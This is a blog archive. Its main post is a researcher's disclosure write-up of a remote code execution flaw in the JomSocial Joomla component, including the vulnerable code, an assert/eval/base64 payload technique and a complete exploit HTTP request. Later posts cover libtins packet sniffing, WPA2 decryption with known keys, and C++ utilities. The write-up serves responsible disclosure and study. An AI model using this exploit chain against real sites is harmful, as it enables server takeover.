Thursday, January 30, 2014

Exploiting a code execution in JomSocial < 3.1.0.4

Update, February 4th: JomSocial has just released a patch for this vulnerability. We contacted them a month after the initial contact and they said that the issue had been fixed in the 3.1.0.1 release. The demo hosted on their site was no longer vulnerable(it still was in the first days of January), so we thought that the issue was indeed fixed. but unfortunately, it wasn't.

Yesterday, Gaston Traberg and I released an advisory regarding a remote code execution vulnerability in the Joomla! JomSocial component, which affected all versions >= 2.6 and < 3.1.0.1. I don't usually like to write about the security vulnerabilities that I find and report, but this one was quite interesting to exploit.

Note that we found this vulnerability by picking random, widespread, Joomla! components and auditing them. This was not a vulnerability found while trying to "hack into" a website. As soon as we found it, it was reported to the vendors.

JomSocial


JomSocial is a component which turns your Joomla! installation into a Facebook-like social network. You've got photos, videos, walls, comments, etc. A lot of its code relies on ajax calls which build the HTML on the server side and gets rendered by the client's browser.

Even though it is not a free product, its PHP code is licensed under GPLv2.

Azrul system plugin


JomSocial relies on a plugin called "Azrul system" which has a module that automatically parses parameters and calls the appropriate function with the specified parameters. This is nice because developers don't have to explicitly parse them and dispatch to the right function; that's done transparently.

Requests that will be parsed by this system contain parameters that look like this:
  option=community&
  no_html=1&
  task=azrul_ajax&
  func=MODULE,FUNCTION&
  TOKEN=1&
  arg2=["_d_","PARAM1"]&
  arg3=["_d_","PARAM2"]&
  arg...
Where:
  • MODULE is the class that will handle the request. These classes have to be located in a specific directory, otherwise the request will fail.
  • FUNCTION is the function defined in class MODULE that will be executed.
  • TOKEN is an anti-CSRF token that the application assigns to each different session.
  • PARAM* indicates the contents of each parameter. As you can see, every parameter is a JSON-encoded string. 
So for example, this call:
  option=community&
  no_html=1&
  task=azrul_ajax&
  func=Foo,Bar&
  baz=1&
  arg2=["_d_","Hello"]&
  arg3=["_d_","World!"]
Would automatically call this function(as long as its defined in the right directory):
class Foo {
  function Bar($str1, $str2) {
     echo "$str1 $str2"; // would echo Hello World!
  }
}

The vulnerability


So, while we were searching for calls to the common insecure functions, such  as eval, system, passthru, etc. we came by a call to the PHP call_user_func_array function. This call was performed in the CommunityPhotosController::ajaxUploadAvatar member function, and it looked like this:

// not relevant code has been removed
public function ajaxUploadAvatar($type, $id, $custom = '') {
  $aCustom = json_decode($custom, true);
  $cTable = JTable::getInstance(ucfirst($type), 'CTable');
  $cTable->load($id);
  if (isset($aCustom['call'])) {
    if (isset($aCustom['call'][0]) && isset($aCustom['call'][1])) {
      $obj = $aCustom['call'][0];
      $method = $aCustom['call'][1];
      $params = count($aCustom['call']) > 2 ? array_slice($aCustom['call'], 2) : array();
      if (!empty($obj) && !empty($method)) {
        $customHTML = call_user_func_array(array($obj, $method), $params);
      }
    }
  }
}

So as you can see, the function does the following:
  • Loads an object representing a database table with the name $type and loads the record with id $id.
  • JSON-decodes its third parameter.
  • If there is a "call" key in the JSON-decoded string, it assumes the value for that key will be an array, and tests to see if there are at least 2 elements in it.
  • The first element of that array will indicate the name of an object or class and the second one, a name of a method, apparently.
  • The rest of the parameters will be parameters for that method.
  • Finally, if everything went well, it calls call_user_func_array using the provided data.
This already looks pretty insecure. We can basically indicate any class name, method and parameters, and we'll be able to execute it. All that's left now is to find a class function that allows us to do interesting stuff, like executing arbitrary PHP code.

Exploiting it


We started searching for calls to more severe functions that would give us complete control over the application, such as eval or system. Of course, we can't call them directly, since we need to call methods defined inside a class, and those are free functions.

At that point, we found a method, _runCommand defined in the CVideos class. It's not a static one, meaning that we should need an instance of an object to call it(at least in theory), but apparently PHP allowed us to do so. Unfortunately, before making a call to system, this function accessed $this, and since there was no $this here(since there's no instance associated with the call), that would trigger a fatal PHP error.

So we kept on looking and found a very interesting function, CStringHelper::escape which looks like this:
static function escape($var, $function='htmlspecialchars')
{
   // four unrelevant lines removed here
   return call_user_func($function, $var);
}
As you can see, it uses call_user_func using the second parameter as the name of the function to call, and the first parameter as its argument. So that's it, if we managed to call this function and provide a non-class function name(such as eval) and some PHP code, we should be able to get it to execute on the server.

Not so fast


Unfortunately, it seems like, since PHP's eval function is actually a language construct rather than a real function, you can't call it this way. For example, if you call it through call_user_func, like this:
<?php
  call_user_func("eval", "echo 'Hello world';");
?>

You'll get an error like the following one:
PHP Warningcall_user_func() expects parameter 1 to be a valid callback, function 'eval' not found or invalid function name in test.php on line 2
So that doesn't work. Of course we can already call system, shell_exec, passthru, etc. but it's always better to be able to execute PHP code, since it's common for those functions to be disabled. We needed a way to execute arbitrary code that didn't require the use of eval, or at least not directly...

There's another function, assert which has some common behavior with eval: it evaluates its parameter as PHP code and stops the execution unless the evaluated expression returns a true boolean value. Using this function we can do something like this:
<?php
  assert("eval('echo 123;');");
?>

Which looks strange but does execute the echo. Unfortunately, since eval always returns NULL unless you're using return statement in the eval'd code, this will always generate a warning, since NULL is implicitly converted to false, making the assertion fail.

We could stop now, since we already reached PHP code execution, but it's better if our exploit doesn't leave traces in logs as well. Moreover, our PHP code has to be composed of only one expression, since the following code:
<?php
  assert("eval('echo 123;'); eval('echo 456;');");
?>

Will only print "123", as the assertion fails before the second eval is executed.

So what we need is a way to execute an arbitrary piece of code which consists of only one expression, doesn't generate any warnings and always returns true.

Actually, we could make it never return as well, right? We could call exit inside the expression, which will stop the execution before the assertion fails. exit takes a parameter, so we could nest another function call as its parameter. Something like this:
assert("exit(foo());");
What if the nested function was eval? We'd already be able to execute arbitrary code! So doing this should work:
assert("exit(eval('echo 123'));");
In the end, what we came up with was the following:
<?php
  assert("@exit(@eval(@base64_decode('BASE64_ENCODED_SCRIPT')))");
?>
The extra base64 encoding was used so that we didn't even need to encode quotes, or any other character that could cause troubles. Note that the extra "@" characters force the PHP interpreter to supress any error messages that might be generated while executing our code.

Putting it all together


Now that we know how to execute any piece of PHP code, we need to build a request that does so. In order to do that, we need:
  • A valid anti-CSRF token. We can find that token by making any request and analyzing the output. There will be a hidden input, whose name is a 32 long hex-characters string and its value will be 1. The name of the input is the token.
  • A valid table name, so that JTable::getInstance returns a valid object. Otherwise, when later calling JTable::load will trigger an error. In this case, we'll use the table "Events".
  • Since JTable::load doesn't throw an exception when there is no record with the given id, we can use any number. Besides, the retrieved record is not used before the call to call_user_func_array.
  • We need to base64 encode the PHP code, and insert it inside our payload.
  • Finally, we need to build an associative array which has a key "call" which maps to a list which contains the name of the class we'll use(CStringHelper), the name of the method to call(escape), , the payload generated in the previous step and the string "assert".
The complete request would look like the following:

POST /index.php HTTP/1.0
Host: example.com
...

option=community&
no_html=1&
task=azrul_ajax&
func=photos,ajaxUploadAvatar&
TOKEN=1&
arg2=["_d_","Event"]&
arg3=["_d_","374"]&
arg4=["_d_","%7B%22call%22%3A%5B%22CStringHelper%22%2C%22escape%22%2C%20%22%40exit%28%40eval%28%40base64_decode%28%27ZWNobyAnSGVsbG8gV29ybGQnOw%3D%3D%27%29%29%29%3B%22%2C%22assert%22%5D%7D"]
The decoded payload(it's just an echo) looks like this:
{
  "call" : [
    "CStringHelper",
    "escape", 
    "@exit(@eval(@base64_decode('ZWNobyAnSGVsbG8gV29ybGQnOw==')));",
    "assert"
  ]
}

Our code should be executed after that, so all that's left is to parse the output. I have uploaded a working python exploit to my github account.

Saturday, October 26, 2013

Creating a simple and fast packet sniffer in C++

I have seen several articles on the web about writing packet sniffers using C and C++ which suggest using raw sockets and dealing with protocol headers and endianness yourself. This is not only very tedious but also there are libraries which already deal with that for you and make it extremely easy to work with network packets.

One of them is libtins, a library I have been actively developing for the past few years. It has support for several protocols, including Ethernet, IP, IPv6, TCP, UDP, DHCP, DNS and IEEE 802.11, and it works on GNU/Linux, Windows, OSX and FreeBSD. It even works on different architectures such as ARM and MIPS, so you could go ahead and develop some application which could be executed inside routers and other devices.

Let's see how you would sniff some TCP packets and print their source and destination port and addresses:
#include <iostream>
#include <tins/tins.h>
using namespace std;
using namespace Tins;
bool callback(const PDU &pdu) {
    const IP &ip = pdu.rfind_pdu<IP>();
    const TCP &tcp = pdu.rfind_pdu<TCP>();
    cout << ip.src_addr() << ':' << tcp.sport() << " -> " 
         << ip.dst_addr() << ':' << tcp.dport() << endl;
    return true;
}

int main() {
    // Sniff on interface eth0
    Sniffer sniffer("eth0");
    sniffer.sniff_loop(callback);
}
This is the output I get when executing it:


As you can see, it's fairly simple. Let's go through the snippet and see what it's doing:
  • The callback function is the one that libtins will call for us each time a new packet is sniffed. It returns a boolean, whch indicates whether sniffing should go on or not, and takes a parameter of type PDU, which will hold the sniffed packet. This library represents packets as a series of Protocol Data Units(PDU) stacked over each other. So in this case, every packet would contain an EthernetII, IP and TCP PDUs.
  • Inside callback's body, you can see that we're calling PDU::rfind_pdu. This is a member function template which looks for the provided PDU type inside the packet, and returns a reference to it. So in the first two lines we're retrieving the IP and TCP layers, and then we're simply printing the addresses and ports.
  • Finally, in main an object of type Sniffer is constructed. When constructing it, we indicate that we want to sniff on interface eth0. After that, Sniffer::sniff_loop is called, which will start sniffing packets and calling our callback for each of them.
Note that this example will run successfully on any of the supported operating systems(as long as you use the right interface name, of course). The endianness of each of the printed fields is handled internally by the library, so you don't even have to worry about making your code work in Big Endian architectures.

Now, you may be wondering whether using libtins will make your code significantly slower. If that is your concern, then you should not worry about it at all! This library was designed keeping efficiency in mind at all times. As a consequence it's the fastest packet sniffing and interpretation library I've tried out (note that I tried several, such as scapy, dpkt, impacket and libcrafter). Go ahead and have a look at these benchmarks to see how fast it actually works.

libtins allows you to implement fast packet sniffers in very few lines of code. It also supports additional features like reassembling and following TCP streams, decrypting WPA2 traffic (both TKIP and AES) and defragmenting IP datagrams.

If you want to learn more about libtins, please visit this tutorial, which covers everything you should know before starting to develop your network sniffing application!

Tuesday, June 4, 2013

Decrypting WEP/WPA2 traffic on the fly

This is the first application I've developed using libtins, a packet crafting and sniffing library I've been developing for a while. In the latest release of that library, I've added support for WPA2 decryption, so this application does very few things and does not handle encription at all; the library does so.

The decryption of WEP and WPA2 traffic has been available for a while now. Applications such as wireshark, tshark and airdecap have supported this for quite some time. However, after adding this decryption feature to libtins, I wondered why there were no applications that let you decrypt the traffic directly from a network interface and make it available, decrypted, for any other application. This is where dot11decrypt was born.

 

Objective


The application sniffs a network interface looking for WEP and WPA2 encrypted traffic. It also analyzes EAPOL(802.1X) handshakes in order to track the nonces shared by peers, which will later be necessary while decrypting WPA2.

Once a packet is decrypted successfully, the 802.11 frame is replaced by an Ethernet header, and the whole packet is written to a tap interface. You now can read those decrypted packets using any other tool, such as Wireshark or ngrep, and perform any kind of analysis.

What is required for decryption

dot11decrypt does not crack any of the above mentioned encryption algorithms. So if you're looking for a wireless cracking tool, then this is not one of them.

In order to crack WEP encrypted traffic, you need to provide the access point's BSSID and the WEP key. The syntax required to indicate that decryption data is the following:
wep:[BSSID]:[KEY]
For example:
wep:00:01:02:03:04:05:mypassword
Indicates that the access point whose BSSID is "00:01:02:03:04:05" uses WEP encryption and the WEP key is "mypassword".

On the other hand, WPA2 traffic is a little bit more complex. In order to generate the first set of keys required to decrypt the traffic(the Pairwise Master Key or PMK), both the pre-shared key and the network SSID(you network's "name") are required.

In order to specify both of this attributes, the following syntax is used:
wpa:[SSID]:[PSK]
As an example:
wpa:MyAccessPoint:MySecretKey
Indicates that any access point which broadcast the SSID "MyAccessPoint" will be decrypted, assuming the PSK is "MySecretKey".

How it works

 

Decrypting WEP frames is fairly simple, given the WEP key, it's just using RC4 over the encrypted data.

Decrypting WPA2, however, is a little bit trickier. In order to decrypt a WPA2 encrypted frame, the following is required:

  • The PMK(mentioned a few lines above).
  • The association SSID -> BSSID.
  • A valid 4-way handshake between the client which sends or is about to receive that frame.
The application initially computes the PMK. Since you only provide the network SSID, then the application will look for beacon frames so as to know which BSSID is broadcasting the given SSID.

After that, when a client performs a handshake against those BSSIDs, a Pairwise Transient Key(PTK) is computed and stored. At that point, any packet sent from or to the associated client will be decrypted using that PTK. If any client is deauthenticated and then authenticated again, that new handshake will be taken into account and used to decrypt its packets.

Luckily for us, all of the above mentioned is already implemented and performed automatically by libtins: inspecting beacon frames looking for the SSID, capturing 4-way handshakes and decrypting the traffic. If you want to have a look at that code, have a look at the WPA2Decrypter class.

Note that WPA2 decryption works for both AES(CCMP) and TKIP encrypted frames, so this works for WPA as well(since this uses TKIP).

Compiling the application

 

In order to compile dot11decrypt, the latest version of libtins is required(version 1.1 at the moment of writing). You can download it from the project's github entry. The library must be compiled using support for WPA2 decryption(this is enabled by default).

Since the application uses some C++11 features, a fairly recent C++ compiler is needed as well. g++ 4.6 is enough. g++ 4.5 might do.

dot11decrypt's source code can be downloaded from github. After you've got these, just go ahead and do the usual:
./configure
make

Using it

 

The application takes as its first argument, the interface in which to listen for packets. This must be a wireless interface in monitor mode. The rest of the arguments specify the data which will be used to decrypt the data, using the syntax mentioned near the beginning of this post:
./dot11decrypt wlan0 wpa:MyAccessPoint:some_password
./dot11decrypt mon0 wep:00:01:02:03:04:05:blahbleehh
After running it, you'll get an output similar to the following:
Using device: tap0
Device is up.
The tap0 interface will now be used to output the decrypted traffic. tcpdump or any other network sniffing tool can be used to process the data. Note that the 802.11(and possibly the RadioTap encapsulation used) and LLC+SNAP frames will be removed and replaced by an Ethernet header.

Note that you require either root privileges or the CAP_NET_ADMIN capability on the executable to run this application successfully.

Example

In this example, I'm going to sniff and decrypt the traffic sent from my phone.

The mon0 interface, the one I'll be using, is in monitor mode. This is the output of running tcpdump on that interface, filtering only IEEE 802.11 data frames for which the second address in that frame is the access point's BSSID:


As you can see, there are several Dot11 QoS Data frames, all of them encrypted.

Now, I'm going to execute dot11decrypt providing the SSID and the WPA2 PSK:


A new tap interface has been created, named tap0. Every decrypted packet will be written to it.

At this point, I connected my phone to the access point. The application captures the 802.1X handshake and it will start decrypting the traffic. In the image below, you can see how the traffic sniffed from the tap0 interface is no longed encrypted:


I hope you find this application useful!

Sunday, October 21, 2012

libtins v0.2 released

After coding and testing libtins a lot in the past months, we're proud to announce the release of the 0.2 version. libtins is a network packet crafting and sniffing library. It allows you to forge packets with very little effort, forgetting about each protocol data unit's endianness, internal representation, etc.

In this release, there have been several changes:

  • IP and hardware addresses can now be handled easily. Instead of using pointers or integral values to represent them, there's now a class which abstract each of them, making it easy to create them from their string representations, and compare them. You can now use hardware addresses as keys inside std::maps, or insert them in std::sets.
  • Added support for big endian architectures. We've worked hard to make sure every getter, setter and function available handles endianness correctly. Now you can create tools and run them on both little and big endian architectures, without worrying about it.
  • Generalized and simplified some interfaces. The Sniffer class required you to inherit a class from an AbstractSnifferHandler just to perform a call to Sniffer::sniff_loop. Now this function takes a template functor argument and calls it every time a new packet is sniffed off the wire, making your life a lot easier.
  • Network interfaces used to be handled internally by each PDU. Classes would usually take a std::string, look up the corresponding interface index and store it, and also provide overloads that took directly the integral index. Now there's a NetworkInterface class which does this job internally. So PDUs now take objects of this type rather than providing several overloads(which in cases like the Dot11 class hierarchy, reduces the boilerplate code significantly).
  • You can now follow TCP streams on the fly. There's a TCPStreamFollower class that sniffs packets(either from a network interface or a pcap file), and reassembles TCP streams, executing a callback whenever there's data available.
  • We're planning to allow decrypting any 802.11 encrypted data frame on the fly. In this release, by providing tuples (bssid, password), you can decrypt WEP-encrypted frames while sniffing, in a completely transparent way. I'll soon add an example in the libtins website on how to do that.
  • We've added support for some new PDUs: Null/Loopback, IEEE 802.3, LLC and DNS.
  • You can now read and write pcap files, using a very simple interface. 
  • Finally, there's been a huge refactoring on the entire code. Code has been RAII'd a lot. There are less pointers moving around, more automatic storage objects and references.
  •  
In case you want to try the library out, please visit its website and download the latest version.

Thursday, August 30, 2012

Compile time MD5 using constexpr

Today, someone on stackoverflow asked how to perform compile-time hashing in C++. After providing a small, naive, example in my answer, I thought it would actually be interesting to implement some well known hashing algorithm using C++11 features, such as constexpr. So I gave MD5 a try, and after some hours of trying stuff, I was able to create compile-time MD5 hashes.

The MD5 hashing algorithm.


Implementing the algorithm itself was not as hard as I thought it would be. The algorithm is roughly like this:
  1. It starts with 4 32-bits integers which contain a predefined value.
  2. The algorithm contains 4 "rounds". On each of them, a different function is applied to those integers and the input string.
  3. The result of those rounds serves as input to the next ones.
  4. Add the 4 resulting 32-bit integers with the original, predefined integer values.
  5. Interpret the resulting integers as a chunk of 16 bytes.
That's it. Note that I've somehow stripped down the algorithm to short strings. A real implementation would iterate several times doing the same stuff on the entire buffer. But since nobody is going to hash large strings on compile time, I've simplified the algorithm a little bit.

The implementation


So basically the implementation was not that hard, some template metaprogramming and several constexpr functions. Since there was a pattern on the way the arguments were provided as input to the functions in each round, I used a specialization which avoided lots of repeated code.

The worst part was generating the input for that algorithm. The input is not just the string which is to be hashed. The steps to generate that input is roughly as follows:
  1. Create a buffer of 64 bytes, filled with zeros.
  2. Copy the input string into the start of the buffer.
  3. Add a 0x80 character on buffer[size_of_input_string].
  4. On buffer[56], the value sizeof_input_string * 8 must be stored.
That's all. The algorithm will only work with strings of no more than 31 bytes. It could be generalized by modifying the appropriate bytes on buffer[57:60], but that was not my objective.

In order to achieve this buffer initialization, I had to somehow decompose the input string into characters, and then join them and those special bytes, into an array which could be used during compile time. In order to achieve this, I implemented a constexpr_array, which is just a wrapper to a built-in array, but provides a data() constexpr member, something that std::array does not have(I'm not really sure why):
template<typename T, size_t n>
struct constexpr_array {
    const T array[n];
    
    constexpr const T *data() const {
        return array;
    }
};
The decomposition ended up pretty simple, but I had to struggle to figure out how the hell to implement it.

Finally, the interface for the compile time MD5 would be the following:
template<size_t n> constexpr md5_type md5(const char (&data)[n]) 

The typedef for the function's result is the following:
typedef std::array<char, 16> md5_type;

Note that everything in the implementation resides in namespace ConstexprHashes.

As an example, this code generates a hash and prints it:
#include <iostream>
#include "md5.h"

int main() {
    constexpr auto value = ConstexprHashes::md5("constexpr rulz");
   
    std::cout << std::hex;
    for(auto v : value) {
        if(((size_t)v & 0xff) < 0x10)
            std::cout << '0';
        std::cout << ((size_t)v & 0xff);
    }
    std::cout << std::endl;
}

This prints out: "b8b4e2be16d2b11a5902b80f9c0fe6d6", which is the right hash for "constexpr rulz".

Unluckily, the only compiler that is able to compile this is clang 3.1(I haven't tested it on newer versions). GCC doesn't like the code, and believes some constexpr stuff is actually non-constexpr. I'm not 100% sure that clang is the one that's right, but it looks like it is.

You can find the MD5 implementation here. Maybe I'll implement SHA1 soon, whenever I have some time.

Well, this was the first time I used constexpr, it was a nice experience. Implementing this using only TMP would be an extreme pain in the ass.

Wednesday, August 22, 2012

small integer C++ wrapper

Currently, I'm working on libtins, a library I'm developing with a friend. This library mainly contains classes that abstract PDUs, among other stuff.

Since PDU classes are basically a wrapper over the protocol data units handled by the operating system, getters and setters are provided to enable the user to modify the fields in them. For example, there is a TCP::data_offset method which takes a value of type uint8_t and stores it in the TCP header's data offset field, which is 4 bit wide.

While developing test units for this library, I would use some random number to initialize those fields, and then use the corresponding getter to check that the same number came out of it. A problem that I faced several times is that, there is no way to indicate that, while a setter method takes an uint8_t, the field being set internally is actually 4 bits wide, so any value larger than 15 would overflow, leading to the wrong number being stored. We really want to be able to detect those ugly errors.

One solution would be to, on each setter, check whether the provided value is larger to 2 ** n - 1, where n is the width of the field being set, and raise an exception if this condition is true. This has the drawback that every setter should make the appropriate check, using the appropriate power of 2, and throwing the same exception on each of them. This boilerplate solution already looks nasty.

So I came with a better solution. C++'s implicit conversions can do magic for us. All we need is a class that wraps a value of an arbitrary bit width(up to 64 bits) that performs the corresponding checks while being initialized.

The wrapper class is called small_uint(I thought about providing support for signed integral types, but finally dropped that option. It'd be easy to implement though). The class declaration is this one:

template<size_t n> class small_uint;

The template non-type parameter n indicates the length, in bits, of the field. This class should be optimal, meaning that it should use to smallest integral type that can hold a value of that width.

Internally, a compile time switch is performed to check which is the best underlying type, meaning, the type in which storing the field wastes less space. For example, for 7 bit small_uints, a uint8_t is used, while 11 bit fields will be stored in a member variable of type uint16_t. This underlying type is typedef'ed as the repr_type.

There is a constructor which takes a repr_type and raises an exception if it is larger than the 2 ** n - 1, and a user-defined conversion to repr_type which simply returns the stored value. Since no arithmetic operations are performed with these integers, there are no such operators defined. It don't really know if defining them would make sense. If you wanted to perform such operations, you would just use standard arithmetic types. Only operator== and operator!= have been defined.

I haven't used this class in libtins yet, but setters would probably look like this:

void TCP::data_offset(small_uint<4> value) {
     tcp_header_.data_offset = value;
}

That way, a nice and clean solution can be achieved, avoiding boiler plate code. Note that internally, C++11 features could make a lot of things easier(such as std::numeric_limits<>::max() being constexpr, std::conditional, and constexpr functions), but I wanted to use only C++03 stuff, since the library is intended to work with the latter standard.

The small_uint implementation can be found here.

Monday, July 2, 2012

Python style range loops in C++

Python is a nice scripting language which has some really flexible characteristics. One thing I like about it is the integer range for-loops that can be achieved using the built-in function range:
for i in range(10):
    # Insert clever statement below 
    print i 
Doing that same thing in C++ would require some for loop like the one below:
for(size_t i(0); i < 10; ++i)
    std::cout << i << std::endl;
Which is larger and less clearer(well, not that much :D). So I created a simple wrapper to achieve the same thing in C++, using C++11's range-based for loops. The wrapper can be found here.

In order to use ranges, a function named range should be used, which contains these overloads:
// Returns a range_wrapper<T> containing the range [start, end)
template<class T>
range_wrapper<T> range(const T &start, const T &end) {
    return {start, end};
}

// Returns a range_wrapper<T> containing the range [T(), end)
template<class T>
range_wrapper<T> range(const T &end) {
    return {T(), end};
}

range_wrapper<> is a simple wrapper that defines begin() and end(), both return a range_iterator, the former one pointing to the beginning of the range and the latter to the end. The range_iterator<> class template is just a wrapper over the template parameter, and defines all of the forward iterator required member functions/typedefs. The prefix/suffix increment operators apply the same operator on the wrapped object, while the dereference operator returns it.

Since range-based for loops require the iterated sequence to define begin() and end() or that the global std::begin()/end() functions are defined for the given type, using the range_wrapper<> class template in these for loops is perfectly valid.

Using this wrapper, that code can be reduced to this:
// Prints numbers in range [0, 10) 
for(auto item : range(10))
    std::cout << item << std::endl;

Using the first overload, which takes the start and end of the range, we can indicate the starting number.
// Prints numbers in range [5, 15) 
for(auto item : range(5, 15))
    std::cout << item << std::endl;
Note that range is a template function, so it could be adapted to perform range iteration through other types(std::string comes to my mind right now).

This same thing can be achieved using boost::irange, but hey, I was bored and wanted to implement it myself.